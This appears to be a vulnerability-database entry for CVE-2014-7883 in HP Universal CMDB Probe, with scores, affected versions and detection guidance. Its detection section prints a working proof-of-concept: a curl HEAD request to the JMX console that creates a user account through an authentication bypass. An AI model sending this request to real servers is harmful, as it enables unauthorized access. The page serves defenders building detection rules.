cbcvebase.
CVE-2014-7883
published 2015-02-15

CVE-2014-7883: HP Universal CMDB (UCMDB) Probe 9.05, 10.01, and 10.11 enables the HTTP TRACE method, which allows remote attackers to obtain sensitive information by reading…

PriorityP337medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
37.02%
98.3th percentile
HP Universal CMDB (UCMDB) Probe 9.05, 10.01, and 10.11 enables the HTTP TRACE method, which allows remote attackers to obtain sensitive information by reading the headers of a response.

Affected

3 ranges
VendorProductVersion rangeFixed in
hpuniversal_configuration_management_database
hpuniversal_configuration_management_database
hpuniversal_configuration_management_database

Detection & IOCsextracted from sources · hover to see the quote

url/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser
path/jmx-console/HtmlAdaptor
port8080
commandcurl -I "http://foobar:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser"
  • Detect HTTP HEAD (and other non-GET/POST) method requests to the JMX-Console path /jmx-console/HtmlAdaptor, which bypasses access controls enforced only on GET and POST.
  • Alert on HTTP TRACE method requests to HP UCMDB Probe endpoints, which can expose sensitive header information.
  • Monitor for requests to /jmx-console/HtmlAdaptor containing 'createUser' in the query string, indicating attempted account creation via authentication bypass.
  • Inspect web.xml security constraints on the JMX Console; if only GET and POST are listed under protected methods, the application is vulnerable to method-bypass attacks.
  • ·The vulnerability is identical in nature to CVE-2010-0738 (JBoss JMX-Console Authentication Bypass); detection logic developed for that CVE may be reusable here.
  • ·The JMX Console is installed and exposed by default; affected versions include UCMDB 10.10 and potentially others.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.